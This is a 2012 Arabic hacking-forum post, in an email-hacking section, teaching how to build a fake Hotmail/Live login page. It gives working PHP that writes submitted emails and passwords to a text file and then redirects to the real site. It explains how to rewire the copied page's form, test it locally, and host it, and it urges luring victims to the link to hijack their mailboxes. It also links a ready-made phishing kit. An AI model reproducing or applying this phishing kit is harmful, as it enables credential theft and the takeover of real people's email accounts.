منتدى عبدو الورفلي لبرامج لهكر وكل جديد من عالم برمجة
{مًرْحَباً بٍـكْ فِي مُنْـتَــدىٌ عَبْدُو اْلوِرْفَلِـي}

إِنْ لَمْ تَـكٌنْ مُسَـجِلْ فِـي مُـنْتَـدى فَـقُمْ بِـي تَسْجِيلْ ..!

{إٍنْ لَمْ تَكـُنْ ذِئْباً أَكَـلَتْـكَا ذٍئَـابْ .. وإِنْ لَمْ تَـكُنْ مِـنْ أَعْضَـائَنـاً فَساًرِعْ بٍيْ آْلإِنْـتِسَـابْ}

منتدى عبدو الورفلي لبرامج لهكر وكل جديد من عالم برمجة

http://werfaly.7olm.org
 
الرئيسيةاليوميةس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 إبداع صفحة مزورة طبق الأصل للهوتميل والتبليغ صارووووخ

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
عبــدو_#$_الــورفلي
رئيس المنتدى
رئيس المنتدى
avatar

عدد المساهمات : 230
نقاط : 739
السٌّمعَة : 0
تاريخ التسجيل : 20/07/2012
العمر : 21
الموقع : libya

مُساهمةموضوع: إبداع صفحة مزورة طبق الأصل للهوتميل والتبليغ صارووووخ   الإثنين يوليو 23, 2012 8:45 pm





اقتباس :
أول خطوة سوف نقوم بها هي فتح المفكرة ( notepad) ونسخ الكود التالي ولصقه داخل المفكرة :

الكود:
 <?php
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
$redirect = "http://login.live.com/login.srf?wa=w...4855&mkt=en-US";
header("********:$redirect");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

طبعاً راح تقولوا هذا كود ايش ؟
أقلكم هذا هو الكود الذهبي إلى راح يرسل التبليغ لنا ، طيب بعد ماقمنا بنسخة ولصقه في المفكرة نقوم بحفظه باسم ( login.php ) وامتداده اعتقد واضح ومع ذلك نحط صورة توضيحيه لعيونكم :




طيب بكذا انهينا الخطوة الأولى ، وننتقل للخطوة الثانية وهي الصفحة ، نروح للمتصفح ونفتح صفحة تسجيل الهوتميل

الكود:
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1258901240&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&id=64855&mkt=en-us&lc=1025


بعد فتح صفحة التسجيل نقوم بحفظها اضغط على ( ctrl+s) اذا متصفحك فايرفوكس


صورة توضيحية





بعد حفظنا للصفحة نقوم بفتحها باستخدام الفكرة ( notepad ) ونقوم بالبحث عن كلمة ( action ) وعندما نجدها نقوم بتغيير العبارة التي أمامها إلى اسم الملف الذي حفظناه في الخطوة الأولى ( login.php ) كما نقوم بالبحث عن كلمة ( post ) وعادة تاتي قبل كلمة أكشن ونقوم بتغييرها إلى كلمة ( get ) ومن ثم نقوم بحفظ التعديلات ...


صورة توضيحية الصفحة قبل التعديل





صورة توضيحية الصفحة بعد التعديل





إلى هنا نكون قطعنا مرحلة جيدة وأصبح لدينا ملفين الأول كود التبليغ والثاني الصفحة ، قبل مانقوم برفعها على استضافة راح نقوم بتجربة العملية على أنفسنا ونشوف ايش النتيجه راح نستخدم برنامج WampServer وهو عبارة عن برنامج سرفر شخصي ...


تحميل البرنامج

http://www.zshare.net/download/68834233760e9f7a



بعد تحميل البرنامج وتنصيبه راح ينزل في السي نقوم بفتح السي ومنه نقوم بفتح مجلد wamp ومنه نقوم بفتح مجلد www راح نجد داخله ملف باسم اندكس نقوم بتغيير اسمه الى اي شي حتى لايتعارض مع اسم صفحتنا ، بعد ذلك نقوم بنقل الملفين الذي كوناها في الخطوتين السابقة إلى داخل هذا المجلد ...


صورة توضيحية للمجلد قبل نقل الملفات إليه





صورة توضيحية للمجلد بعد نقل الملفات إليه




بعد ذلك نذهب إلى المتصفح ونقوم بكتابة الرابط التالي في العنوان :

الكود:
http://127.0.0.1/


سنجد أن المتصفح قام بفتح صفحتنا المزورة التي وضعناها سابقاً في مجلد www بداخل مجلد السرفر الشخصي ، نقوم بإجراء التجربة ونرى ماذا ينتج ، نقوم بوضع أي عنوان ايميل ونقوم بوضع أي كلمة مرور ومن ثم نقوم بالضغط على signin ونتابع ماذا حدث ....


صور توضيحية





ياسلام أعتقد شغل نظيف وأخر حلاوة وتبليغ ولا أحلى ولا أسرع من كذا صارووووووخ أرض- أرض ...


طيب بعد ما اتأكدنا أن الصفحة تمام والتبليغ مية مية ، نقوم برفع الثلاث ملفات ( index.php - login.php -pass ) إلى مساحتنا المجانية وأعتقد الكل يعرف كيف يعمله مساحة مجانية ، بعد الرفع نقوم بتجربة الصفحة على أنفسنا والنتائج راح تعجبكم إنشاء الله ...، بعد ذلك تبدأ عملية التخطيط لاختراق ايميلات الضحايا من خلال ارسال روابط الصفحة لهم وهذه العملية تعتمد على ذكائك في اقناع الضحية لضغطه على الرابط وفي نفس الوقت يجب أن تكون مستعد عند ملف الباس المرفوع لكي تشاهد معلومات الضحية ومن ثم الذهاب مسرعا لتسجيل دخولك لإيميله



لحظة الموضوع ماأنتهى لاكن أخوكم تعب فاعذروني ، إنشاء الله راح أكمل الموضوع باضافة طريقة أخرى للإختراق بالصفحة المزورة


والأن قبل مانختم الموضوع ، يطيب لي أن أرفق لكم صفحة الهوتميل المزورة وكود التبليغ من انتاج مختبرات جيوش الهكر وقد أثبتت فعاليتها الحمد لله ....


التحميل


http://www.zshare.net/download/68886928e74090de

باسوورد فك الضغط لكافة البرامج في الموضوع

الكود:
www.aljyyosh.com

بسلامه



اقتباس :

الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://werfaly.7olm.org
 
إبداع صفحة مزورة طبق الأصل للهوتميل والتبليغ صارووووخ
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى عبدو الورفلي لبرامج لهكر وكل جديد من عالم برمجة :: قسم إختراق البريد والايميلات-
انتقل الى: